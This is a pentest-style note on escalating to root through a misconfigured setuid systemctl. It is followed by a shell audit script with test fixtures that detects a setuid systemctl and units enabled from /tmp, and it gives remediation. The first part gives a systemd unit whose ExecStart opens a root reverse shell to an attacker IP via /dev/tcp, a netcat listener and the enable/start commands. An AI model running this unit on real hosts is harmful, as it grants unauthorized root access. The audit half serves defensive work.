Systemctl

This privilege escalation is possible if systemctl is misconfigured with the SUID bit set: the binary then runs as root no matter which user invokes it, so any unit it starts runs as root.

Create a systemd unit file

Create root.service with the following contents:

[Unit]
Description=rooooot

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/<YOUR IP>/1234 0>&1'

[Install]
WantedBy=multi-user.target

If required, transfer the file to /tmp (for example with wget and python).

Register the custom service with systemctl and start it

Start a netcat listener before starting the service: nc -nlvp 1234

$ /bin/systemctl enable /tmp/root.service
$ /bin/systemctl start root
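The following audit script is an added example and is not part of the original note or the referenced write-up. It checks a host for the two artefacts this technique depends on or leaves behind: a setuid systemctl binary, and units enabled from outside the standard unit directories (enabling /tmp/root.service as above leaves a symlink under /etc/systemd/system pointing into /tmp). The fixture paths, the fake systemctl and the unit names are constructed for the demonstration; on a real host run it as `audit /bin/systemctl /etc/systemd/system`.

```shell
#!/bin/sh
# Added audit example (not from the original note). Paths are taken as
# arguments so the checks can be exercised against a constructed tree.

# is_setuid PATH -> exit 0 if the file has the setuid bit set
is_setuid() {
    [ -u "$1" ]
}

# foreign_unit_links SYSTEMD_DIR -> prints "link -> target" for every symlink
# under SYSTEMD_DIR whose target is not a standard unit directory or /dev/null
# (masked units). Links into /tmp, /home, /dev/shm etc. are the indicator.
foreign_unit_links() {
    find "$1" -type l 2>/dev/null | while read -r link; do
        target=$(readlink "$link")
        case "$target" in
            /etc/systemd/system/*|/lib/systemd/system/*|/usr/lib/systemd/system/*|/usr/local/lib/systemd/system/*|/dev/null) ;;
            *) printf '%s -> %s\n' "$link" "$target" ;;
        esac
    done
}

# audit SYSTEMCTL_PATH SYSTEMD_DIR -> exit 1 if either finding is present
audit() {
    rc=0
    if is_setuid "$1"; then
        echo "FINDING: $1 is setuid (fix: chmod u-s $1)"
        rc=1
    fi
    links=$(foreign_unit_links "$2")
    if [ -n "$links" ]; then
        echo "FINDING: unit(s) enabled from outside the standard unit directories:"
        echo "$links"
        rc=1
    fi
    return $rc
}

# make_fixture compromised|clean -> prints a constructed tree mirroring what
# the technique above leaves on a host (compromised) or a healthy layout (clean).
# Unit names and targets in the fixture are constructed for this example.
make_fixture() {
    base=$(mktemp -d)
    wants="$base/etc/systemd/system/multi-user.target.wants"
    mkdir -p "$base/bin" "$wants" "$base/tmp"
    : > "$base/bin/systemctl"
    if [ "$1" = compromised ]; then
        chmod 4755 "$base/bin/systemctl"          # setuid systemctl
        : > "$base/tmp/root.service"
        ln -s "$base/tmp/root.service" "$wants/root.service"   # enabled from /tmp
    else
        chmod 0755 "$base/bin/systemctl"
        # what a normal enable writes: a link to the packaged unit (dangling here)
        ln -s /lib/systemd/system/ssh.service "$wants/ssh.service"
    fi
    echo "$base"
}

# Stand-alone run: audit the constructed compromised tree, then the clean one.
if [ "${1:-}" = demo ]; then
    bad=$(make_fixture compromised); audit "$bad/bin/systemctl" "$bad/etc/systemd/system"
    good=$(make_fixture clean);      audit "$good/bin/systemctl" "$good/etc/systemd/system" && echo "clean tree: no findings"
fi
```

The allow-list in foreign_unit_links deliberately matches the absolute target path that `systemctl enable` records, so a unit enabled from a world-writable or user-owned directory shows up even if the file was later removed. The remediation for the first finding is to clear the bit (`chmod u-s /bin/systemctl`); for the second, disable the unit and delete the link, then look for the process it started.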

References

https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49
